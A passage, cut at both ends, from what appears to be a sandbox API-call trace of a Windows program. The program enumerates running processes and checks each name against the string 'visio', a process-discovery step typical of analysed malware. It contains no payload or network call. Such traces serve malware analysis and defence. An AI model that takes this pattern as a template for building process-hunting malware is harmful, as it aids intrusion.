th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.148] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357cdf8 [0100.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357cdf8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.148] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.148] StrStrIA (lpFirst="svchost.exe", lpSrch="visio") returned 0x0 [0100.149] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.150] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357ce10 [0100.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357ce10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.150] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.150] StrStrIA (lpFirst="svchost.exe", lpSrch="visio") returned 0x0 [0100.150] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.152] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357cfd8 [0100.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357cfd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.152] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.152] StrStrIA (lpFirst="svchost.exe", lpSrch="visio") returned 0x0 [0100.152] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.153] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357cf78 [0100.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357cf78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.153] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.153] StrStrIA (lpFirst="svchost.exe", lpSrch="visio") returned 0x0 [0100.153] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.154] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357d038 [0100.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357d038, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.154] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.154] StrStrIA (lpFirst="svchost.exe", lpSrch="visio") returned 0x0 [0100.154] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.155] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357d020 [0100.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357d020, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.156] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.156] StrStrIA (lpFirst="svchost.exe", lpSrch="visio") returned 0x0 [0100.156] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0100.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.157] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357cfc0 [0100.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x357cfc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0100.157] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0100.157] StrStrIA (lpFirst="spoolsv.exe", lpSrch="visio") returned 0x0 [0100.157] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.160] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357cf90 [0100.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357cf90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.160] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.160] StrStrIA (lpFirst="svchost.exe", lpSrch="visio") returned 0x0 [0100.160] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0100.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.161] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357cf48 [0100.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x357cf48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0100.162] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0100.162] StrStrIA (lpFirst="audiodg.exe", lpSrch="visio") returned 0x0 [0100.162] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0100.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.163] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357cfa8 [0100.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x357cfa8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0100.164] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0100.164] StrStrIA (lpFirst="sihost.exe", lpSrch="visio") returned 0x0 [0100.164] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.165] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357cf18 [0100.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357cf18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.165] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.165] StrStrIA (lpFirst="svchost.exe", lpSrch="visio") returned 0x0 [0100.165] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0100.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.169] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357cf30 [0100.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x357cf30, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0100.169] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0100.169] StrStrIA (lpFirst="taskhostw.exe", lpSrch="visio") returned 0x0 [0100.169] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0100.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.171] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357cff0 [0100.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x357cff0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0100.171] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0100.171] StrStrIA (lpFirst="explorer.exe", lpSrch="visio") returned 0x0 [0100.171] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0100.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.172] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357dfe8 [0100.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x357dfe8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0100.172] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0100.172] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="visio") returned 0x0 [0100.173] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0100.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0100.174] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356bde8 [0100.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356bde8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0100.174] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0100.174] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="visio") returned 0x0 [0100.177] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0100.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.178] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357dda8 [0100.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x357dda8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0100.179] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0100.179] StrStrIA (lpFirst="Memory Compression", lpSrch="visio") returned 0x0 [0100.179] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0100.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0100.180] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x357dec8 [0100.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x357dec8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0100.180] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0100.180] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="visio") returned 0x0 [0100.180] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0100.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.181] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357d008 [0100.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x357d008, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0100.181] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0100.181] StrStrIA (lpFirst="SearchUI.exe", lpSrch="visio") returned 0x0 [0100.182] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0100.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0100.183] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357dee8 [0100.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x357dee8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0100.183] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0100.183] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="visio") returned 0x0 [0100.183] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0100.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.184] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357cf60 [0100.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x357cf60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0100.184] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0100.184] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="visio") returned 0x0 [0100.184] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0100.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.185] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357d050 [0100.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x357d050, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0100.185] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0100.185] StrStrIA (lpFirst="pending.exe", lpSrch="visio") returned 0x0 [0100.185] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0100.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0100.186] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356be10 [0100.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356be10, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0100.186] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0100.186] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="visio") returned 0x0 [0100.186] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0100.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.187] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357dde8 [0100.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x357dde8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0100.187] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0100.187] StrStrIA (lpFirst="swing prefer.exe", lpSrch="visio") returned 0x0 [0100.187] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 